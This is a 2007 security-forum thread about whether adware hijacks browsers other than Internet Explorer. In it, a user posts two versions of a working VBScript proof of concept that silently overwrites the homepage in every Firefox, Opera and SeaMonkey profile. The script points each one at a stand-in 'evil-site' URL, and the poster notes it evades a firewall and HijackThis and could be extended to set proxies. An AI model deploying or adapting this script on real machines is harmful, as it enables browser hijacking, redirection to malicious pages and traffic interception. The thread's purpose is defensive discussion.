Is there any malware that affects browsers other than IE?

Discussion in 'malware problems & news' started by vkidv, Jul 14, 2007.

Thread Status:
Not open for further replies.
  1. vkidv

    vkidv Registered Member

    Joined:
    Oct 6, 2003
    Posts:
    62
    Hi,

    Is there any malware in the wild that hijacks non IE browsers when executed? (I do not mean infected from visiting.)

    My curiosity stems from security software features like reset defaults. They only apply to IE but not other browsers. I assumed this is because no spyware targets them, market share too low etc. Firefox has a javascript configuration file and Opera is a windows .ini file. It just feels a bit easy compared to modifying the registry.

    Edit: Realised I posted to wrong place. Sorry! I meant Hijack section not general topics.
     
  2. Mrkvonic

    Mrkvonic Linux Systems Expert

    Joined:
    May 9, 2005
    Posts:
    8,695
    Hello,

    Your question has several layers?

    Is there malware that can affect other browsers?
    Yes, once installed, in Windows, malware can control anything. A non-MS browser could be a target.

    Is there malware that does this?
    Very, very few.

    Is there malware that propagates through other browsers or that can get you infected while you use other browsers?
    Only a few poor proofs of concept, nothing real.

    Answer: Don't use IE and 99% of your problems are solved.

    Mrk
     
  3. vkidv

    vkidv Registered Member

    Joined:
    Oct 6, 2003
    Posts:
    62
    Thanks for replying.

    I'm not asking if it is possible. I'm asking if there is are any wild examples. It just seems like the obvious next step and I'm suprized it isn't as prevalent.
    • Malware manages to run on user's system through a P2P program, a worm, internet explorer
    • The malware is already in, it hijacks internet explorer as its first target. It has nothing to lose by hijacking Firefox or Opera aswell.
    • There are less products that will alert you if firefox or opera settings change? (I don't know of any)
    • It has nothing to do with the browsers themselves, the security of Opera and Firefox is irrelevant. The attack is coming from the side rather than the front. Defending the door when the attack comes from the window.
     
  4. ASpace

    ASpace Guest

    This is completely wrong . Neither Firefox nor Opera are as safe as they are thought . Just because there are more threats which become more popular because they target the most popular web-browser does not mean that avoiding IE changes everything . Both Firefox and Opera have security issues, too and their problems are fixed just like those in IE because if not they will immediately become victims of threats .

    Version 7 of Internet Explorer is much more secure than previous versions of itself and it is easily noticable for its users . Vista's IE7 is better than any other because of Protected Mode. Just notice people , since they upgraded there are much less complaints of browser hijack of IE (on the forums/newsgroups or real world)

    In my views , all latest browser are equally secure when run on Windows NT/2000/2003/XP (e.g. MS Windows IE7 = Mozilla Firefox) . Vista makes IE7 the most secure on it because of User Account Control and Protected mode (you can learn more about them on the internet) :thumb:
     
  5. Mrkvonic

    Mrkvonic Linux Systems Expert

    Joined:
    May 9, 2005
    Posts:
    8,695
    Hello,

    Firefox and Opera have no issues. Show me one, ONE example. Real-life example. ONE.

    It says Microsoft fan in your sig ...

    Mrk
     
  6. tisungho

    tisungho Registered Member

    Joined:
    May 27, 2007
    Posts:
    148
    Hello, properly off topic!

    I like some add-ons of FF like Adblock, Noscript to advoi Ads and Popup. Do you know any ones similar to them? I used IE7Pro, but it doesn't block popup.

    Regards,
     
  7. vkidv

    vkidv Registered Member

    Joined:
    Oct 6, 2003
    Posts:
    62
    This was the answer I was expecting.

    I do not mean while running Opera or Firefox. I'm wondering if there any real life wild malwares that hijack them from the outside. As I've mentioned, Opera uses an .ini file and firefox uses a .js file.

    Which would require more permissions? Writing to the registry for IE or writing to an INI file or writing to that js file? Probably the registry, because both files are in Application Data per user profile.

    As soon as malware code runs, you have already lost. Opera and Firefox can be the most securest browsers in the world. It doesn't matter if the spyware runs from elsewhere. They are not running so they cannot protect themselves.

    EDIT: He may have Microsoft fan in his signature but you have Linux fanboyism in yours :( You also lose points for using the word 'pwn'...
     
  8. Mrkvonic

    Mrkvonic Linux Systems Expert

    Joined:
    May 9, 2005
    Posts:
    8,695
    Hello,

    Linux and fanboyism do not go together well. More like, efficiency and enlightenment? Fanboy means endorsing something without rational justification. Endorsing Linux is simply logical, like drinking orange juice in hot summer or turning up air conditioning in your car in Florida. You would not call anyone doing that a fanboy?

    While I do oppose the usage of l77t terminology in general terms, sometimes its usage is of great assistance when a significant message needs be delivered with minimal use of words. In this regard, the language of the impatient neo-nerds is of utmost use.

    Hence, pwn delivers the punch far more efficiently than, let's say, obliterate or humiliate. And I do sincerely apologize for using efficient more than once in the post.

    Cheers,
    Mrk
     
  9. TairikuOkami

    TairikuOkami Registered Member

    Joined:
    Oct 10, 2005
    Posts:
    2,509
    Location:
    Slovakia
    It is easy to create eg a DLL injection for any browser, only HIPS can prevent it, not a browser, but IE is the logical choise, simply because it is in every Windows. It would be silly to create it eg for FF only, because it would affect only about 15% instead of 99%. So using other browsers, anything but IE, will improve your security for sure. In a real life, it does not matter, that FF2 has more vulnerabilities than IE7, it is about, who are the hackers pointed at and for now, it is IE. ;)


    Simply put, do as Mrkvonic said: Don't use IE and block it in your firewall, so it would not leak, if it would infected and silently launched by a malware.
     
  10. ASpace

    ASpace Guest

  11. Ice_Czar

    Ice_Czar Registered Member

    Joined:
    May 21, 2002
    Posts:
    696
    Location:
    Boulder Colorado

    rather than possibilities, consider probabilities
    a serious bit of malicious code slips into your box, its undetected
    now why would the author want to notify the victim they are compromised by hijacking the browsers? They are more interested in making money, they might try to automatically harvest info from browser caches, then slave you to a bot net, drop a few back doors even a very slim chance of an actual first person looksee if your from an interesting IP block, but tipping their hand with an obvious hijack wouldnt be very likely at all.

    if they have root they can do anything
    (rape your dog, burn down your house, steal your car :p )
    a lot of hijacking is about driving traffic to a portal for further and more serious exploitation
    but if your already compromised to the extent you suggest, there is no need for that

    while we are reviewing malicious motivation, the classic arguments of the Win\Nix debates
    1. crafting malicious code for the greatest return on investment > Windows
    (a secretive OS replete with an army of idiot users)
    2. crafting malicious code for the OS you know > Linux
    (a free OS readily available throughout the economically challenged nurseries of malware hotspots, but typically with a poor ROI when it comes to end users and generally needs a lazy admin to succeed, damage can be extensive however because of the prevalence of LAMP (a couple of popular compromised servers can then serve up alot of Windows exploits to unpatched idiots))

    as far as browsers, the same motivational logic applies
    and the browser is very often the leading vector for infection
    history has not been kind when you combine the two
    IE has historically been the biggest pain in the butt to Microsoft when it comes to security
    what is important isnt the number of vulnerabilities, but rather the ones that lead to critical system access and how long till they are patched, critical system access through an alternative browser is rare (and is generally a system flaw also found in IE) but more importantly Firefox has kept patching ahead of the in the wild exploits far far better than IE

    http://secunia.com/product/11/?task=statistics (IE 6)
    http://secunia.com/product/12366/?task=statistics (IE 7)

    http://secunia.com/product/4227/?task=statistics (FF 1.X)
    http://secunia.com/product/12434/?task=statistics (FF 2.X)

    (a simple comparison of how much red you see will do)

    when its all said and done, the question isnt can an OS or browser be secured
    (they cant all the time) but rather how large a window of serious vulnerability will the average idiot experience
    (and if your running Linux your not average, though Im proof an idiot can do it :p )
    however today Im on my W2K box w\ FF 2.0.0.4

    Firefox on Linux was immune (as are the rest)
    and Microsoft knew about the ANI bug in December

    statement also assumes that the default DEP settings have been altered, precluding the average idiot
    protected mode is effective, but only if its turned on. Intrusive security, is typically unused security.
    I would point out its Microsoft that is dragging its heels to extend protected mode information to Mozilla not the other way round from what I can tell.

    if you want to slam Firefox, at least use the right ammunition :p

    http://secunia.com/advisories/25984/
     
    Last edited: Jul 15, 2007
  12. vkidv

    vkidv Registered Member

    Joined:
    Oct 6, 2003
    Posts:
    62
    Right I don't think anybody understood my question. That's okay, I wasn't very clear.

    To clarify, when I say malware I actually mean: spyware, adware, crapware...Anything that tries to hijack you..

    I'll answer it myself.

    Yes. There is a script that can hijack your Opera and Firefox homepage webpage. I know this because I've just written it.


    My visual basic script can be run from limited user mode. Visual Basic Scripts have less power than full blown applications.

    Opera is an .ini file in the user directory and can be modified by anything that runs from the user. Firefox uses a javascript file.
    • My firewall is Comodo Personal Firewall Pro (free version). It doesn't seem to notice anything.
    • HijackThis doesn't see any changes.
    • This could be used to leak information. Assuming I have set my firewall to allow Firefox or Opera to access information - it will -- through query strings in the URL.

    This could be modified to change practically any value in about:config in firefox or opera:config in Opera. Proxy configuration is exposed by these configuration files. One who was serious about hijacking someone's machine or sniffing someone could configure a proxy for these browsers -- while in user mode.

    This is my script.
    Code:
    '' change homepages of alternative browsers
    '' written by vkidv, July 2007
    '' tested under limited user in windows xp sp2
    
    Dim fso : Set fso = CreateObject("Scripting.FileSystemObject")
    Set WShell = CreateObject("WScript.Shell")
    Const ForReading = 1, ForWriting = 2, ForAppending = 8, TRISTATE_FALSE = 0
    
    DefaultHomepage = "http://evil-site/?creditcarddetails"
    
    CloseIt = " is open and needs to be closed..."
    
    Function isOpen(strProcess)
    '' code following is from script center technet converted into function for conveniency
      strComputer = "."
    Set objWMIService = GetObject("winmgmts:" _
        & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
    Set colProcesses = objWMIService.ExecQuery _
        ("Select * from Win32_Process Where Name = '"& strProcess &"'")
    
      If colProcesses.Count = 0 Then
          isOpen = False
      Else
          isOpen = True
      End If
      
      Set objWMIService = Nothing
      Set colProcesses = Nothing
    End Function
    
      If Not isOpen("firefox.exe") Then
        Firefox GetNewHomepageFor("Firefox")
      End If
      If Not isOpen("Opera.exe") Then
        Opera GetNewHomepageFor("Opera")
      End If
    
    
    Function GetNewHomepageFor(strFor) 
      If WScript.Arguments.Count = 1 Then
        GetHomepage = WScript.Arguments(0)
      Else
        Specify = InputBox("WARNING: Current homepage for " & strFor & " will be overwritten with the following homepage. Cancel to stop.","New homepage for " & strFor, DefaultHomepage)
        If Specify <> vbEmpty Then
          GetNewHomepageFor = Specify
          DefaultHomepage = Specify
        Else Wscript.Quit(-1)
        End If
      End IF
    End Function
    
    Sub Opera(strURL)
    '' changes opera homepage
      OperaDir = "%APPDATA%\Opera\Opera\profile\"
      OperaDir = WShell.ExpandEnvironmentStrings(OperaDir)
      
      If fso.FolderExists(OperaDir) Then
        WScript.Echo "Opera homepage changed to " & strURL
        WriteIni OperaDir&"opera6.ini","User Prefs","Home URL",strURL
      End If
    End Sub
    
    Sub Firefox(strURL)
      
      ProfileDir = "%APPDATA%\Mozilla\Firefox\"
      ProfileDir = WShell.ExpandEnvironmentStrings(ProfileDir)
      
      profile_count = 0
      
      Do Until iReturn = 2
        Profile = GetINI(ProfileDir & "profiles.ini","Profile" & profile_count,"Path", "", iReturn)
      If iReturn = 2 Then Exit Do
        
        Profile = Replace(Profile,"/","\")
        WScript.Echo "Firefox homepage for " & Profile & " changed to " & strURL
        Profile = ProfileDir & Profile
        Set FireConfig = fso.OpenTextFile(Profile & "\prefs.js", 8)
        FireConfig.WriteLine("user_pref('browser.startup.homepage','" & strURL & "'); // i am maliciously added)")
            
        profile_count = profile_count + 1
      Loop
    End Sub
    
    '' FOLLOWING CODE IS NOT AUTHORED BY ME
    '' OBTAINED FROM http://mystuff.clarke.co.nz/MyStuff/vbsstuff.asp?func=CreateTempFile&Title=Generate%20a%20filename%20and%20path%20for%20a%20working%20file%20in%20the%20%25temp%25%20directory#CreateTempFile
    '' very useful, thankyou
    
    Function DeleteFile(strFiletoDelete)
        if fso.FileExists(strFiletoDelete) then
            set f=fso.GetFile(strFiletoDelete)
            f.attributes = 0 
            f.Delete True 
        end if
    End Function
    
    Function GetINI(str_FileName,str_SectionName,str_ItemName, sDefault, iReturn)
      'iReturn : 1 = File not found
      ' 2 = Section not found
      ' 3 = Item not found 
      Dim sTEMP, myFile, strFileName, strSectionName, strItemName
      iReturn=0 
      strFileName=str_FileName
      strSectionName=str_SectionName
      strItemName=str_ItemName
      GetINI = sDefault
    
      strFileName=Trim(strFileName)
      strSectionName=Trim(strSectionName)
      strItemName=Trim(strItemName)
    
      If Left(strSectionName,1) <> "[" Then
        strSectionName="[" + strSectionName
      End If 
    
      If Right(strSectionName,1) <> "]" Then
        strSectionName=strSectionName + "]"
      End If 
    
      If Not fso.fileexists(strFileName) Then
        iReturn = 1
        Exit Function
      End If 
    
      Set MyFile = fso.OpenTextFile(strFileName, ForReading)
      'Detect Empty File
      If myfile.AtEndOfStream Then
        MyFile.Close
        Exit Function 
      End If
      Do
        sTEMP = Trim(MyFile.ReadLine)
        If Left(sTEMP,1) = ";" Then ' ignore a line that start with a ";"
          sTEMP=""
        End If
      Loop Until myfile.AtEndOfStream Or (InStr(UCase(sTEMP),UCase(strSectionName)) = 1) 
    
      If myfile.AtEndOfStream Then
        iReturn = 2
        MyFile.Close
        Exit Function 
      End If 
    
      Do
        sTEMP = Trim(MyFile.ReadLine)
        If Left(sTEMP,1) = ";" Then ' ignore a line that start with a ";"
          sTEMP=""
        End If
        If InStr(UCase(sTEMP),"[") = 1 Then ' Start of next section
          iReturn = 3
          MyFile.Close
          Exit Function 
        End If
      Loop Until myfile.AtEndOfStream Or (InStr(UCase(sTEMP),UCase(strItemName)) = 1) 
    
      MyFile.Close
    
      If (InStr(UCase(sTEMP),UCase(strItemName)) <> 1) Then
        iReturn = 3
        Exit Function 
      End If 
    
      sTEMP=Trim(Right(sTEMP,Len(sTEMP) - (InStr(sTEMP,"="))))
    
      If InStr(sTEMP,";") <> 0 Then ' Check for "on the line" comments
        sTEMP=Trim(Left(sTEMP,InStr(sTEMP,";")-1))
      End If
    
      If sTEMP <> "" Then : GetINI=sTEMP
    End Function 
    
    Function GenerateTempFileName 
        Const TEMPORARY_FOLDER = 2
        Dim fso : Set fso = CreateObject("Scripting.FileSystemObject")
        Dim tfolder, tname
        Set tfolder = fso.GetSpecialFolder(TEMPORARY_FOLDER)
        tname = fso.GetTempName 
        GenerateTempFileName = tfolder & "\" & tname 
    End Function 
    
    
    Function WriteIni(strFileName, strSection, strItem, strValue)
      Dim bSectionExists, bInSection, bItemExists, bwrote, strPath, strline, strUcaseLine, iReturn, tfSourceINI, tfDestINI, strWorkingFile, aX, sLeftofEquals
    
      strWorkingFile=GenerateTempFileName
      DeleteFile(strWorkingFile) ' Delete the temporary file if it exists
      bInSection = False
      bSectionExists = False
      GetINI strFileName, strSection, strItem,"",iReturn
      if iReturn = 0 then
        bItemExists = TRUE
      else
        bItemExists = FALSE
      end if
      bwrote = False
      Err.Clear
      Set tfSourceINI = fso.OpenTextFile(strFileName, ForReading, True)
      Set tfDestINI = fso.OpenTextFile(strWorkingFile, ForWriting, True, TRISTATE_FALSE)
      If Err.Number <> 0 Then
        DeleteFile(strWorkingFile) 
        Set tfSourceINI = Nothing
        Set tfDestINI = Nothing
        WriteIni = False
        Exit Function
      End If
      While tfSourceINI.AtEndOfStream = False
        strline = Trim(tfSourceINI.ReadLine)
        strUcaseLine = UCase(strline)
        sLeftofEquals = strUcaseLine 
        if Len(strUcaseLine) > 1 then
          aX = Split(strUcaseLine,"=") ' Split up the string at the "=" 
          sLeftofEquals = Trim(aX(0)) ' Get the left most bit 
        end if
        If bwrote = False Then
          If strUcaseLine = UCase("[" & strSection & "]") Then
          bSectionExists = True
          bInSection = True
          ElseIf InStr(strline, "[") = 1 Then
            bInSection = False
          End If
        End If
    
        If bInSection Then 
          If bItemExists = False Then
            tfDestINI.WriteLine strline
            if len(strValue) => 1 then ' Don't write item out if Value is empty
              tfDestINI.WriteLine strItem & "=" & strValue
            end if 
            bwrote = True
            bInSection = False
          ElseIf sLeftofEquals = UCase(strItem) Then
            if len(strValue) => 1 then ' Don't write item out if Value is empty
              tfDestINI.WriteLine strItem & "=" & strValue
            end if 
            bwrote = True
            bInSection = False
          Else
            tfDestINI.WriteLine strline
          End If
        Else
          tfDestINI.WriteLine strline
        End If
      Wend
      If bSectionExists = False Then ' strSection doesn't exist
        tfDestINI.WriteLine
        tfDestINI.WriteLine "[" & strSection & "]"
        tfDestINI.WriteLine strItem & "=" & strValue
      End If
    
      tfSourceINI.Close
      tfDestINI.Close
      If Err.Number = 0 Then
        fso.DeleteFile strfilename
        fso.CopyFile strWorkingFile , strFilename
        DeleteFile(strWorkingFile)
        WriteIni = True
      Else
        DeleteFile(strWorkingFile)
        WriteIni = False
      End If
      Set tfSourceINI = Nothing
      Set tfDestINI = Nothing
    End Function 
    
    Instructions: Save as .vbs file, run with wscript by double clicking, or cscript filename [page to set to]
    Run have installed firefox and/or Opera.
    Please note
    • The script attempts to change every Mozilla profile's homepage.
    • Opera and/or firefox must be closed for the script to work. It will not try if they are open.
    • Even if Mozilla firefox has a homepage set somewhere else in the configuation, this will override it because it is set afterward. Upon firefox close, firefox will save only the last set homepage will be in the file.

    If you have VBS files blocked, that is not the point. Not many permissions seem to be required to make the pages that this script does.

    If I've overlooked anything (I have a feeling I have) please tell me. I might be missing something obvious.
     
    Last edited: Jul 16, 2007
  13. munckman

    munckman Registered Member

    Joined:
    May 2, 2002
    Posts:
    100
    Thanks vkidv,

    It certainly changed my Firefox homepage. When starting ff, I was presented with something about cannot find server evil-site. My homepage was about:blank prior to allowing the script to run.

    I understand that you are not concerned about users allowing the script to run but how can this be used to hijack a browser otherwise? I think that I don't know enough.

    Thanks
     
  14. herbalist

    herbalist Guest

    VB scripts run from the desktop aren't testing the browser. They're run by Windows Scripting Host, which is not governed by browser settings. On my setup, Script Sentry intercepts this script, allowing me to view it before deciding if I want it to run. I allowed WScript to execute it (intercepted by SSM), I just get an error message. "File or class name not found.."

    This is more of a test of the user and of how well your defenses against script files are set up.

    Vulnerabilities that allow changes to a system or a malicious install are found on occasion in alternate browsers on rare occasion and get fixed pretty quickly. IE6 has some actively exploited vulnerability waiting to be patched on more days than it doesn't. As far as IE7 is concerned, give it time. It will be compromised like all Microsoft browsers.

    Do you expect any different at a security forum? Everybody has their favorite systems, apps, etc.

    Rick
     
  15. herbalist

    herbalist Guest

    Instead of a non-existent test page, it would change it to a page that attempts to install to your system or attempts some other malicious activity. It's a way to get you to a site you wouldn't go to otherwise.
    Rick
     
  16. ASpace

    ASpace Guest

    Being a fan of something/somebody means you like it/them . There is a reason , at least for me , to like the companies written in my signature -they are all the qualities of theirs and the people working there. What I tell/write is not written just because "I am their fan" . I am neither blind nor deaf , I can realise what is going on around me and if my favourites start going down I can change them but nothing can make me do it if they stay that way .

    You all understand wrong the word "fan" and only speculate with it!!!
    Is there anything wrong I have written in this thread?! I don't think so


    Edit... and if you want to know , I do run only IE on my main system(s) but I use Firefox2 on my test computer because it is XP SP1 (not updated to SP2) , Firefox will "protect" better because it can be updated , IE6 SP1 is not updatable at all .
     
    Last edited by a moderator: Jul 23, 2007
  17. SirMalware

    SirMalware Registered Member

    Joined:
    Jun 6, 2006
    Posts:
    133
    Both Opera and Mozilla do not use Browser Helper Objects or Active X common targets of malware code writers. Security issues or not, with an admin user account in Windows and heavy usage of IE, you're a HijackThis log just waiting to happen.
     
  18. vkidv

    vkidv Registered Member

    Joined:
    Oct 6, 2003
    Posts:
    62
    Hello, thank you for your responses.

    My script isn't a test of the browsers defence while running. Instead, while they are not running, they are sitting ducks. I was curious why they are not currently targeted by spyware. My post title is: "Is there any malware that affects browsers other than IE?".
    munckman, my stance is that if malware or spyware enters from some avenue such as P2P or Internet Explorer, it has nothing to lose by attaching itself to Firefox and Opera. This is because it is already won the battle - the battle to be executed by the machine.

    I thought there was a reason why. I tried myself and there is no technical reason. I can only assume the reason why is that there is not much advantage in attaching to Opera or Firefox because they represent a small marketshare.

    herbalist, you may have found a bug... Do you have Firefox and/or Opera installed? I may have made an assumption that wasn't obvious in my installation.

    As for HijackThis. I want HijackThis and other browsers to display the settings of firefox, opera and other browsers. There might be no real wild malware but if it is as easy as hijacking Internet Explorer...

    ---
    Off topic:

    There is innocence in saying "Microsoft fan" like that of saying you like a certain tv show or book fan. Being a fan is expressing yourself. For example, "Harry Potter fan". This is because I read and enjoy Harry Potter.

    My problem comes when fan becomes fanboyism. This occurred in this topic when someone entered singling an enemy fan camp out.
    EDIT: The quote in question:
    The elipsis represents what? Dismissal?
    You do not single out an irrelevant detail to use as a weapon in argument. The fanboyism became apparent when usage of memes like 'pwn' and the questionable statement that Linux pwns Vista.


    An example of fictional fanboyism: For example, Harry Potter pwns Lord of the Rings.
    • Who cares if he is a Microsoft fan?
    • Who cares if he is a Linux fan?
    • I don't
    • I care when the Linux fan uses the fact of being a Microsoft fan as a weapon. That is simply not right. Doing so is just asking for arguments.
    Wow. This thread is amazing. I've managed to pull Opera, Firefox and Internet Explorer rivalry plus Windows and Linux. I apologise.
     
    Last edited: Jul 24, 2007
  19. lu_chin

    lu_chin Registered Member

    Joined:
    Oct 27, 2005
    Posts:
    294
    I think as you said if a piece of malware had entered and got executed on a PC, its battle was already won. The damage could be so much and deep into the system that targeting any browers at this point would not be much of a return of interest. A rootkit might be fully functional without the need to work through any browsers on an infected PC. Even simply changing the HOST file would be another venue to affect systemwide connections, etc.

     
  20. vkidv

    vkidv Registered Member

    Joined:
    Oct 6, 2003
    Posts:
    62
    Of course :)

    I will now explicitly say that I mean:
    adware
    spyware
    crapware
    I mean malware but without all the viruses/trojans/worms that tend not to mess about with your browser settings.

    I tend to lung them all into one term because they're all malicious. Sorry :oops:
     
  21. herbalist

    herbalist Guest

    I'm using Sea Monkey as my default browser, previously known as the Mozilla Suite. No Opera or FF installed. Never really liked the look or feel of FireFox. By any chance, were you assuming XP or another NT operating system? I was hoping it would work as I wanted to see if my SSM rules for wscript.exe would also block it.

    HiTech Boy,
    All I said is that it's expected for people at a place like this to have favorite apps, operating systems, etc, and to list them in a signature. I don't know what you read into that statement, but that's all I said.

    Rick
     
  22. vkidv

    vkidv Registered Member

    Joined:
    Oct 6, 2003
    Posts:
    62
    I've used Mozilla in the past (before the rename) and preferred it to Firefox, too.

    I'm installing it now...

    Right. SeaMonkey uses different folder. That might explain your 'file not found' error herbalist! Thanks for your help. I have amended the script to change SeaMonkey's homepage too.

    I am using Windows XP. If you are using Windows 98 as your avatar says, I have no idea whether it will work or not. Please let me know with the amended script!

    If anybody gets any errors please say so!

    NOTE This will change all of your profile's homepages...for good measure! This aggression would probably be utilized in real malware so I have intentionally not hardcoded it.

    Code:
    '' change homepages of alternative browsers
    '' written by vkidv, July 2007
    '' tested under limited user in windows xp sp2
    '' version +1, amended 26 July 2007
    '' firefox, opera and seamonkey
    
    Dim fso : Set fso = CreateObject("Scripting.FileSystemObject")
    Set WShell = CreateObject("WScript.Shell")
    Const ForReading = 1, ForWriting = 2, ForAppending = 8, TRISTATE_FALSE = 0
    
    DefaultHomepage = "http://evil-site/?creditcarddetails"
    ' this intentionally doesn't resolve to demonstrate
    
    CloseIt = " is open and needs to be closed..."
    
    Function isOpen(strProcess)
    '' code following is from script center technet converted into function for conveniency
      strComputer = "."
    Set objWMIService = GetObject("winmgmts:" _
        & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
    Set colProcesses = objWMIService.ExecQuery _
        ("Select * from Win32_Process Where Name = '"& strProcess &"'")
    
      If colProcesses.Count = 0 Then
          isOpen = False
      Else
          isOpen = True
      End If
      
      Set objWMIService = Nothing
      Set colProcesses = Nothing
    End Function
    
      If Not isOpen("firefox.exe") Then
        NewHomepage = GetNewHomepageFor("Firefox") 
        If NewHomepage <> False Then Firefox NewHomepage
      End If
      
      If Not isOpen("Opera.exe") Then
        NewHomepage = GetNewHomepageFor("Opera")
        If NewHomepage <> False Then Opera NewHomepage
      End If
      
      If Not isOpen("seamonkey.exe") Then
        NewHomepage = GetNewHomepageFor("SeaMonkey")
        If NewHomepage <> False Then SeaMonkey NewHomepage
      End If
    
    Function GetNewHomepageFor(strFor) 
      If WScript.Arguments.Count = 1 Then
        GetNewHomepageFor = WScript.Arguments(0)
      Else
        Specify = InputBox("WARNING: Current homepage for " & strFor & " will be overwritten with the following homepage. Cancel to stop.","New homepage for " & strFor, DefaultHomepage)
        If Specify <> vbEmpty Then
          DefaultHomepage = Specify
          GetNewHomepageFor = Specify
        Else
          GetNewHomepageFor = False
        End If
      End IF
    End Function
    
    Sub Opera(strURL)
    '' changes opera homepage
      OperaDir = "%APPDATA%\Opera\Opera\profile\"
      OperaDir = WShell.ExpandEnvironmentStrings(OperaDir)
      
      If fso.FolderExists(OperaDir) Then
        WScript.Echo "Opera homepage changed to " & strURL
        WriteIni OperaDir&"opera6.ini","User Prefs","Home URL",strURL
      End If
    End Sub
    
    Sub Firefox(strURL)
      
      ProfileDir = "%APPDATA%\Mozilla\Firefox\"
      ProfileDir = WShell.ExpandEnvironmentStrings(ProfileDir)
      
      profile_count = 0
      Completion = ""
      
      Do Until iReturn = 2
        Profile = GetINI(ProfileDir & "profiles.ini","Profile" & profile_count,"Path", "", iReturn)
      If iReturn = 2 Then Exit Do
        
        Profile = Replace(Profile,"/","\")
        Completion = Completion & "Firefox homepage for '" & Profile & "' changed to " & strURL
        Profile = ProfileDir & Profile
        Set FireConfig = fso.OpenTextFile(Profile & "\prefs.js", ForAppending)
        FireConfig.WriteLine("user_pref('browser.startup.homepage','" & strURL & "'); // i am maliciously added)")
            
        profile_count = profile_count + 1
      Loop
      
      If Len(Completion) > 0 Then WScript.Echo Completion
      Set Completion = Nothing
      
    End Sub
    
    Sub SeaMonkey(strURL)
      ProfileDir = "%APPDATA%\Mozilla\Profiles\"
      ProfileDir = WShell.ExpandEnvironmentStrings(ProfileDir)
      
      Set ProfileDir = fso.GetFolder(ProfileDir)
      
      Completion = ""
      For Each NamedProfile in ProfileDir.SubFolders
      ' the user-named profiles
        
        For Each Profile in NamedProfile.SubFolders
          If fso.FileExists(Profile.Path & "\prefs.js") Then
          Completion = Completion & "SeaMonkey homepage for profile named '" & NamedProfile.Name & "'' changed to " & strURL & vbNewLine
          SeaMonkeyProfile Profile.Path,strURL
           Exit For ' we found the profile file so we can stop
          End If
        Next
      Next
      
      If Len(Completion) > 0 Then WScript.Echo Completion
      Set Completion = Nothing
    
    End Sub
    
    Sub SeaMonkeyProfile(Profile,strURL)
      
      Set SeaConfig = fso.OpenTextFile(Profile & "\prefs.js", ForAppending)
        SeaConfig.WriteLine("user_pref('browser.startup.homepage','" & strURL & "'); // i am maliciously added)")
      Set SeaConfig = Nothing
      
    End Sub
    
    '' FOLLOWING CODE IS NOT AUTHORED BY ME
    '' OBTAINED FROM http://mystuff.clarke.co.nz/MyStuff/vbsstuff.asp?func=CreateTempFile&Title=Generate%20a%20filename%20and%20path%20for%20a%20working%20file%20in%20the%20%25temp%25%20directory#CreateTempFile
    '' very useful, thankyou
    
    Function DeleteFile(strFiletoDelete)
        if fso.FileExists(strFiletoDelete) then
            set f=fso.GetFile(strFiletoDelete)
            f.attributes = 0 
            f.Delete True 
        end if
    End Function
    
    Function GetINI(str_FileName,str_SectionName,str_ItemName, sDefault, iReturn)
      'iReturn : 1 = File not found
      ' 2 = Section not found
      ' 3 = Item not found 
      Dim sTEMP, myFile, strFileName, strSectionName, strItemName
      iReturn=0 
      strFileName=str_FileName
      strSectionName=str_SectionName
      strItemName=str_ItemName
      GetINI = sDefault
    
      strFileName=Trim(strFileName)
      strSectionName=Trim(strSectionName)
      strItemName=Trim(strItemName)
    
      If Left(strSectionName,1) <> "[" Then
        strSectionName="[" + strSectionName
      End If 
    
      If Right(strSectionName,1) <> "]" Then
        strSectionName=strSectionName + "]"
      End If 
    
      If Not fso.fileexists(strFileName) Then
        iReturn = 1
        Exit Function
      End If 
    
      Set MyFile = fso.OpenTextFile(strFileName, ForReading)
      'Detect Empty File
      If myfile.AtEndOfStream Then
        MyFile.Close
        Exit Function 
      End If
      Do
        sTEMP = Trim(MyFile.ReadLine)
        If Left(sTEMP,1) = ";" Then ' ignore a line that start with a ";"
          sTEMP=""
        End If
      Loop Until myfile.AtEndOfStream Or (InStr(UCase(sTEMP),UCase(strSectionName)) = 1) 
    
      If myfile.AtEndOfStream Then
        iReturn = 2
        MyFile.Close
        Exit Function 
      End If 
    
      Do
        sTEMP = Trim(MyFile.ReadLine)
        If Left(sTEMP,1) = ";" Then ' ignore a line that start with a ";"
          sTEMP=""
        End If
        If InStr(UCase(sTEMP),"[") = 1 Then ' Start of next section
          iReturn = 3
          MyFile.Close
          Exit Function 
        End If
      Loop Until myfile.AtEndOfStream Or (InStr(UCase(sTEMP),UCase(strItemName)) = 1) 
    
      MyFile.Close
    
      If (InStr(UCase(sTEMP),UCase(strItemName)) <> 1) Then
        iReturn = 3
        Exit Function 
      End If 
    
      sTEMP=Trim(Right(sTEMP,Len(sTEMP) - (InStr(sTEMP,"="))))
    
      If InStr(sTEMP,";") <> 0 Then ' Check for "on the line" comments
        sTEMP=Trim(Left(sTEMP,InStr(sTEMP,";")-1))
      End If
    
      If sTEMP <> "" Then : GetINI=sTEMP
    End Function 
    
    Function GenerateTempFileName 
        Const TEMPORARY_FOLDER = 2
        Dim fso : Set fso = CreateObject("Scripting.FileSystemObject")
        Dim tfolder, tname
        Set tfolder = fso.GetSpecialFolder(TEMPORARY_FOLDER)
        tname = fso.GetTempName 
        GenerateTempFileName = tfolder & "\" & tname 
    End Function 
    
    
    Function WriteIni(strFileName, strSection, strItem, strValue)
      Dim bSectionExists, bInSection, bItemExists, bwrote, strPath, strline, strUcaseLine, iReturn, tfSourceINI, tfDestINI, strWorkingFile, aX, sLeftofEquals
    
      strWorkingFile=GenerateTempFileName
      DeleteFile(strWorkingFile) ' Delete the temporary file if it exists
      bInSection = False
      bSectionExists = False
      GetINI strFileName, strSection, strItem,"",iReturn
      if iReturn = 0 then
        bItemExists = TRUE
      else
        bItemExists = FALSE
      end if
      bwrote = False
      Err.Clear
      Set tfSourceINI = fso.OpenTextFile(strFileName, ForReading, True)
      Set tfDestINI = fso.OpenTextFile(strWorkingFile, ForWriting, True, TRISTATE_FALSE)
      If Err.Number <> 0 Then
        DeleteFile(strWorkingFile) 
        Set tfSourceINI = Nothing
        Set tfDestINI = Nothing
        WriteIni = False
        Exit Function
      End If
      While tfSourceINI.AtEndOfStream = False
        strline = Trim(tfSourceINI.ReadLine)
        strUcaseLine = UCase(strline)
        sLeftofEquals = strUcaseLine 
        if Len(strUcaseLine) > 1 then
          aX = Split(strUcaseLine,"=") ' Split up the string at the "=" 
          sLeftofEquals = Trim(aX(0)) ' Get the left most bit 
        end if
        If bwrote = False Then
          If strUcaseLine = UCase("[" & strSection & "]") Then
          bSectionExists = True
